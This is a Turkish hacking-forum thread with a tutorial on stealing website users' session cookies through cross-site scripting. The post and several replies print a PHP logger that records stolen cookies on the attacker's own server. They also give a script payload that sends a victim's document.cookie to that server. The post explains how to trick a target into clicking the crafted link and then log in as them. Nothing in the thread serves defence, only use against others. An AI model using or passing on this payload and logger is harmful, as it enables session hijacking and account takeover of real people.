Hertürlü Web tabanlı Saldırı Taktik ve Stratejileri
XSS Ve(İle) Cookie Çalarak Hacking
XSS Ve(İle) Cookie Çalarak Hacking
-
Selamlar…
Bu dökümanda xss ile cookie çalma ile hackingten bahsedeceğiz ama öncelikle XSS ten bahsetmek istiyorum…
XSS,Cross site scripting anlamına gelir yani çapraz site betiklemesi.Bazı karakterlerin filtrelenmemesi sonucunda sitede javascript çalıştırılarak tehdit oluşturulabilir.
Çeşitli komutlarla bir takım işlemler yapabilir,şimdi ki konumuz ne,cookie,bu yöntemle cookie de çalabilir o yüzden XSS i şimdilik bırakıp(zaten en basit anlatımı budur) cookie nedir onu tanımlayalım.Cookie/çerez sitenin sizi tanıması için size atadığı bir değerdir.Site sizi bu değerden tanır.”Beni hatırla” gibi seçeneklere imkan sağlayan da cookielerdir,yani yukarıda az önce belirttiğim gibi cookie kimliğimizdir ,kimliğimizi değiştirir,bir başka kimliğe bürünürsek o kimlik altında işlemler yapabiliriz
Az önce demiştim bu işlemleri yapmak için javascript çalıştırmamız lazım,bunun için javascript kodu gerekli kodumuz şu…
<script>alert(”document.cookie”);</script>
Bu komutu kullanıcaz,bunu sitenin search bölümünde de kullanabiliriz ya da url sonuna ekleyerek te deneyebiliriz şöyle;
www.hedefimiz.com/.....javascriptkodumuz (benim javascriptkodumuz yazdığım yere siz yukarıdaki kodu yazıcaksınz)Burada sayfada kullanıyoruz.Eğer sitede açık varsa biz cookieyi görücez ama kendi cookiemizi .Tabi bize kendi cookiemiz lazım değil :S.Başkasının cookiesini görmemiz için bunu başkasının tıklaması lazım,onun değerlerinin gelmesi lazım.Bunun için bize sniffer lazım olucak,kodları veriyorum(ben yazmadım );
<?php
$cookie = $_GET[’cookie’];
$fp = fopen(’log.php’, ‘a’);
fwrite($fp, ‘Cookie: ‘.$cookie.’
’);
fclose($fp);
?>Bu kodu hostumuza atıyoruz,bilmemne.php olarak kaydedin (bilmemne dediğim nasıl kaydetmek istiyorsanız yani).Ondan sonra yapacağımız işleme gelelim;
<script>location.href=’http://www.seninsiten.com/bilmemne.php?cookie= ‘%2Bescape(document.cookie)</script>
Burada seninsiten.com/bilmemne.php cookie çalma dosyasını attığınız yer olacak ve bunu tıklatacaksınız,tabi direk olarak bunu tıklatmanız bir işe yaramaz.Adamın site deki cookiesini çalmak istiyoruz çünkü…
Bunu az önce yukarıda /… şeklindeki linkin sonuna ekliyoruz yani javascript kodumuz dediğimiz yere,bunu yaptığınızda o kişinin cookileri size geliyor ve o cookileri kullanıp(çeşitli programlarla,örneğin:cookie editor) o kişi adına giriş yapabiliyorsunuz…
kolay gele….AntiOksidan/anlatım yaptığım blogumda yazdım önce ordan direk c/p ettim o yüzden smiley çıktı bi de kırmızı yazı: D
not: saat 06:20 bi hata olmuşsa affola,bayılacam yorgunluktan :D -
Helal olsun bu saatte valla :D
-
anti seni öpebilirmiyim hacı :D teşekkür ederiz verdiğin bilgiler hakkatten gözden kesinlikle kaçmayacak değerli dökümanlar...
-
bu saatte bu performans, helal hacı işe yarar bir döküman ;)
-
bari sniffer ın kodunu tam ver lan :D
-
Sniffer kodu tamamdır mesajı editlerken
<?php kodu
kaybolmuş,ekledim,sorun yok amele ne yaygaracı adamsın ak : D -
<?php
$cookie = $_GET[’cookie’];
$fp = fopen(’log.php’, ‘a’);
fwrite($fp, ‘Cookie: ‘.$cookie.’
’);
fclose($fp);
?>tabii sacma da gelebilir. o kadar bilgim yok bu konuda ama bu kodu asp seklinde de yazılabilir mi ? illa ki php mi olması gerekir.
-
Sabahın 6sında döküman yazmış adam :) Tebrikler..
-
warlife;
Ben php kodunu kullanıyorum,ama asp de yazabilirsen/bulabilirsen olur neden olmasın -
warlife bunu yazdı:
-----------------------------?>?>?>$cookie = $_GET[’cookie’];
$fp = fopen(’log.php’, ‘a’);
fwrite($fp, ‘Cookie: ‘.$cookie.’
’);
fclose($fp);
?>tabii sacma da gelebilir. o kadar bilgim yok bu konuda ama bu kodu asp seklinde de yazılabilir mi ? illa ki php mi olması gerekir.
-----------------------------.jsp .cfm .asp .vs vs vs farketmez sunucu tabanlı bir dil olsun yeter
edit: kod hatalı abüler : Parse error: syntax error, unexpected ':' in /x/x/public_html/1/1.php on line 4
:S
-
<?php
$cookie = $_GET[’cookie’];
$fp = fopen(’log.php’, ‘a’);
fwrite($fp, ‘Cookie: ‘.$cookie.’
’);
fclose($fp);
?>bu olucak,aynısını ben kendi hostuma attım sorun yok, cookieyi " " arasına alın
not: phpci sandmane teşekkürler mucks : D